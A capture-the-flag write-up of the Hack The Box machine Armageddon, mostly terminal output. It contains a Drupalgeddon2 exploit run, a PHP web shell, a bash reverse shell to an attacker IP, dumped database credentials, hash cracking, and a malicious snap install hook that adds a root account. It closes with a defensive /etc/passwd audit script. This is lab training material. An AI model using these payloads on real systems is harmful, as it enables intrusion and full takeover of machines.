Armageddon starts by exploiting the Drupal web server; the exploit is hinted at by the box name (Drupalgeddon2). After gaining a shell as the apache user, MySQL credentials can be found in a web server config file. Credentials for brucetherealadmin are recovered from the password hash stored in MySQL. As brucetherealadmin we have sudo rights to install snap packages, so we install a malicious snap package and gain root.
# Nmap 7.91 scan initiated Thu Sep 30 09:46:05 2021 as: nmap -p- -oN ping_tcp 10.129.48.89
Nmap scan report for 10.129.48.89
Host is up (0.041s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Thu Sep 30 09:46:29 2021 -- 1 IP address (1 host up) scanned in 24.49 seconds
# Nmap 7.91 scan initiated Thu Sep 30 09:46:50 2021 as: nmap -p22,80 -sV -sC -oN script_tcp 10.129.48.89
Nmap scan report for 10.129.48.89
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 30 09:47:07 2021 -- 1 IP address (1 host up) scanned in 16.24 seconds
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.
┌──(kali㉿kali)-[~/Documents/htb/Armageddon/nmap]
└─$ searchsploit drupal 7.5
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                 | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                  | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)       | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)       | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)          | php/webapps/35150.php
Drupal < 7.34 - Denial of Service                                                 | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)          | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)       | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Executio | php/webapps/44449.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Executio | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasp | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)  | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Exe | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                    | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                | php/webapps/46459.py
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Documents/htb/Armageddon/nmap]
└─$ searchsploit -m 44449                                                    130 ⨯
  Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44449
     Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
File Type: Ruby script, ASCII text

Copied to: /home/kali/Documents/htb/Armageddon/nmap/44449.rb
┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ ruby 44449.rb http://10.129.48.89
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.129.48.89/
--------------------------------------------------------------------------------
[+] Found  : http://10.129.48.89/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo DGAJYSXB
[+] Result : DGAJYSXB
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.129.48.89/shell.php)
[!] Response: HTTP 200 // Size: 6.   ***Something could already be there?***
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://10.129.48.89/shell.php' -d 'c=hostname'
armageddon.htb>> id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
armageddon.htb>>
┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ cat rev.php
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.30/4444 0>&1'") ?>

┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
armageddon.htb>> pwd
/var/www/html
armageddon.htb>> curl http://10.10.14.30/rev.php -o rev.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    71  100    71    0     0    785      0 --:--:-- --:--:-- --:--:--   788
┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ curl http://10.129.48.89/rev.php
┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ nc -lvnp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.48.89.
Ncat: Connection from 10.129.48.89:45890.
bash: no job control in this shell
bash-4.2$ id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
bash-4.2$
bash-4.2$ python3 -c "import pty;pty.spawn('/bin/bash');"
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/lib64/python3.6/pty.py", line 154, in spawn
    pid, master_fd = fork()
  File "/usr/lib64/python3.6/pty.py", line 96, in fork
    master_fd, slave_fd = openpty()
  File "/usr/lib64/python3.6/pty.py", line 29, in openpty
    master_fd, slave_name = _open_terminal()
  File "/usr/lib64/python3.6/pty.py", line 59, in _open_terminal
    raise OSError('out of pty devices')
OSError: out of pty devices
bash-4.2$ grep -irn password
CHANGELOG.txt:87:- Fixed that following a password reset link while logged in leaves users unable
CHANGELOG.txt:88:  to change their password (minor user interface change:
CHANGELOG.txt:322:  elements, such as textfields, textareas, and password fields (API change:
CHANGELOG.txt:571:- Changed the password reset form to pre-fill the username when requested via a
CHANGELOG.txt:745:- Introduced a 'user_password_reset_timeout' variable to allow the 24-hour
CHANGELOG.txt:746:  expiration for user password reset links to be adjusted (API addition).
CHANGELOG.txt:914:- Fixed usability bug with first password field being pre-filled by certain
CHANGELOG.txt:971:- More secure password generation.
CHANGELOG.txt:1032:    * Implemented a pluggable password system and much stronger password hashes
CHANGELOG.txt:1033:      that are compatible with the Portable PHP password hashing framework.
CHANGELOG.txt:1034:    * Rate limited login attempts to prevent brute-force password guessing, and
CHANGELOG.txt:1063:    * Redesigned password strength validator.
CHANGELOG.txt:1304:  Password leakage in URL), see SA-CORE-2009-007.
CHANGELOG.txt:1437:    * Dynamically check password strength and confirmation.
CHANGELOG.txt:1517:- Fixed security issues (Cross site scripting and Password leakage in URL), see
CHANGELOG.txt:1766:    * Reworked the 'request new password' functionality.
includes/ajax.inc:713:      case 'password':
includes/authorize.inc:38:      '#markup' => t('WARNING: You are not using an encrypted connection, so your password will be sent in plain text. <a href="@https-link">Learn more</a>.', array('@https-link' => 'http://drupal.org/https-information')),
includes/authorize.inc:247:  // We do *not* want to store passwords in the database, unless the
includes/authorize.inc:252:      if ($form['connection_settings'][$filetransfer_backend][$key]['#type'] != 'password') {
includes/authorize.inc:263:  // Save the connection settings minus the password.
includes/common.inc:847:  // Add in username and password to Proxy-Authorization header if needed.
includes/common.inc:849:    $proxy_password = variable_get('proxy_password', '');
includes/common.inc:850:    $options['headers']['Proxy-Authorization'] = 'Basic ' . base64_encode($proxy_username . (!empty($proxy_password) ? ":" . $proxy_password : ''));
includes/common.inc:1253:      (?:(?:[\w\.\-\+!$&'\(\)*\+,;=]|%[0-9a-f]{2})+:)*  # a username or a username and password
(Lines Removed)
sites/default/settings.php:70: *   'password' => 'password',
sites/default/settings.php:84: * username, password, host, and database name.
sites/default/settings.php:122: *       'password' => 'password',
sites/default/settings.php:137: *       'password' => 'password',
sites/default/settings.php:229: *   'password' => 'password',
sites/default/settings.php:237: *   'password' => 'password',
sites/default/settings.php:254:      'password' => 'CQHEy@9M*m23gBVj',
sites/default/settings.php:579: * by using the username and password variables. The proxy_user_agent variable
sites/default/settings.php:588:# $conf['proxy_password'] = '';
themes/bartik/css/ie.css:5:#password-strength-text {
themes/bartik/css/style-rtl.css:135:/* -------------- Password Meter ------------- */
themes/bartik/css/style-rtl.css:137:#password-strength {
themes/bartik/css/style-rtl.css:142:#password-strength-text {
themes/bartik/css/style-rtl.css:221:.password-suggestions ul li {
themes/bartik/css/style.css:1062:/* -------------- Password Meter ------------- */
themes/bartik/css/style.css:1065:.password-parent {
themes/bartik/css/style.css:1068:.password-parent,
themes/bartik/css/style.css:1069:div.form-item div.password-suggestions {
themes/bartik/css/style.css:1072:.password-strength-text,
themes/bartik/css/style.css:1073:.password-strength-title,
themes/bartik/css/style.css:1074:div.password-confirm {
themes/bartik/css/style.css:1077:.password-strength-text {
themes/bartik/css/style.css:1080:div.password-confirm {
themes/bartik/css/style.css:1242:.password-suggestions ul li {
themes/bartik/css/style.css:1415:div.password-suggestions {
cat sites/default/settings.php | grep CQHEy@ -A 5 -B 5
array (
  'default' =>
  array (
    'database' => 'drupal',
    'username' => 'drupaluser',
    'password' => 'CQHEy@9M*m23gBVj',
    'host' => 'localhost',
    'port' => '',
    'driver' => 'mysql',
    'prefix' => '',
  ),
bash-4.2$ mysql -e 'show databases;' -u drupaluser -p'CQHEy@9M*m23gBVj'
Database
information_schema
drupal
mysql
performance_schema
bash-4.2$ mysql -e 'show tables;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal
Tables_in_drupal
actions
authmap
batch
block
block_custom
block_node_type
block_role
blocked_ips
cache
cache_block
cache_bootstrap
cache_field
cache_filter
cache_form
cache_image
cache_menu
cache_page
cache_path
comment
date_format_locale
date_format_type
date_formats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_data_field_image
field_data_field_tags
field_revision_body
field_revision_comment_body
field_revision_field_image
field_revision_field_tags
file_managed
file_usage
filter
filter_format
flood
history
image_effects
image_styles
menu_custom
menu_links
menu_router
node
node_access
node_comment_statistics
node_revision
node_type
queue
rdf_mapping
registry
registry_file
role
role_permission
search_dataset
search_index
search_node_links
search_total
semaphore
sequences
sessions
shortcut_set
shortcut_set_users
system
taxonomy_index
taxonomy_term_data
taxonomy_term_hierarchy
taxonomy_vocabulary
url_alias
users
users_roles
variable
watchdog
bash-4.2$ mysql -e 'select * from users;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal
uid	name	pass	mail	theme	signature	signature_format	created	access	login	status	timezone	language	picture	init	data
0				NULL	0	0	0	0		NULL	0	NULL
1	brucetherealadmin	$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt	admin@armageddon.eu			filtered_html	1606998756	1607077194	1607076276	1	Europe/London		0	admin@armageddon.eu	a:1:{s:7:"overlay";i:1;}
3	asd	$S$D40oou5E4SEXknHp0Y1I.tA/sc1Bm4VxDF7BzUiv40UF2XwFYmfg	asd@asd.com			filtered_html	1633012858	0	0	0	Europe/London		0	asd@asd.com	NULL
bash-4.2$
.\hashcat.exe -a 0 -m 7900 hashes.txt rockyou.txt
hashcat (v6.2.3) starting

Successfully initialized NVIDIA CUDA library.

Failed to initialize NVIDIA RTC library.

* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
             CUDA SDK Toolkit required for proper device support and utilization.
             Falling back to OpenCL runtime.

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch

OpenCL API (OpenCL 1.2 CUDA 11.1.96) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #1: GeForce RTX 3090, 22912/24576 MB (6144 MB allocatable), 82MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Uses-64-Bit
* (null)

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1102 MB

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921529
* Keyspace..: 14344385

$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Drupal7
Hash.Target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
Time.Started.....: Thu Sep 30 10:57:54 2021 (4 secs)
Time.Estimated...: Thu Sep 30 10:57:58 2021 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    78215 H/s (8.35ms) @ Accel:4 Loops:64 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 335872/14344385 (2.34%)
Rejected.........: 0/335872 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:32704-32768
Candidate.Engine.: Device Generator
Candidates.#1....: PencilKeyboardScanner123 -> sacro
Hardware.Mon.#1..: Temp: 53c Fan: 30% Util: 99% Core:1830MHz Mem:9501MHz Bus:16

Started: Thu Sep 30 10:57:42 2021
Stopped: Thu Sep 30 10:57:59 2021
┌──(kali㉿kali)-[~/Documents/htb/Armageddon]
└─$ sshpass -p booboo ssh brucetherealadmin@10.129.48.89
Last login: Thu Sep 30 16:59:11 2021 from 10.10.14.30
[brucetherealadmin@armageddon ~]$
[brucetherealadmin@armageddon tmp]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
COMMAND=id
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta
sudo snap install xxxx_1.0_all.snap --dangerous --devmode
[brucetherealadmin@armageddon tmp]$ curl http://10.10.14.30/xxxx_1.0_all.snap -o xxxx_1.0_all.snap
[brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install ./xxxx_1.0_all.snap --dangerous --devmode
xxxx 1.0 installed
[brucetherealadmin@armageddon tmp]$ cat /etc/passwd | tail
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
root2:S3g6q5KuTzNkU:0:0:root:/root:/bin/bash
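The snap install hook ran as root and its footprint is visible in the last line of /etc/passwd: a second UID 0 account, with a crypt(3) hash stored directly in the world-readable passwd file instead of /etc/shadow. Both are cheap to detect. The Python below is an added example, not from the writeup: a small /etc/passwd audit that flags exactly those two conditions (plus empty password fields). The sample input is constructed from the `tail` output above with a normal `root` line added so there is a legitimate UID 0 entry to compare against; run it against the real file by passing a path.

```python
import sys
from typing import Dict, List, Tuple

# Constructed sample: the `tail /etc/passwd` output shown above, plus a regular
# root line so the audit has a legitimate UID 0 account that must not be flagged.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
root2:S3g6q5KuTzNkU:0:0:root:/root:/bin/bash
"""

# Field 2 values that mean "no usable hash here" (shadowed or locked). Anything
# else is a real crypt(3) hash that every local user can read and crack offline.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text: str) -> List[Dict[str, object]]:
    """Parse passwd(5) lines into dicts; malformed lines raise rather than hide."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """Return (account, issue) pairs for UID 0 duplicates and hashes in passwd."""
    findings = []
    for e in parse_passwd(text):
        # Any UID 0 account other than root is a backdoor until proven otherwise.
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "extra-uid0-account"))
        if e["pw"] == "":
            findings.append((e["name"], "empty-password"))
        elif e["pw"] not in SHADOWED_OR_LOCKED:
            findings.append((e["name"], "hash-in-passwd"))
    return findings


if __name__ == "__main__":
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for account, issue in audit_passwd(source):
        print(f"{issue}: {account}")
```

On the sample this reports `extra-uid0-account: root2` and `hash-in-passwd: root2`. The same two checks are worth wiring into whatever integrity monitoring watches /etc/passwd and /etc/sudoers, since a `NOPASSWD: /usr/bin/snap install *` rule lets any snap's install hook make exactly this kind of change as root.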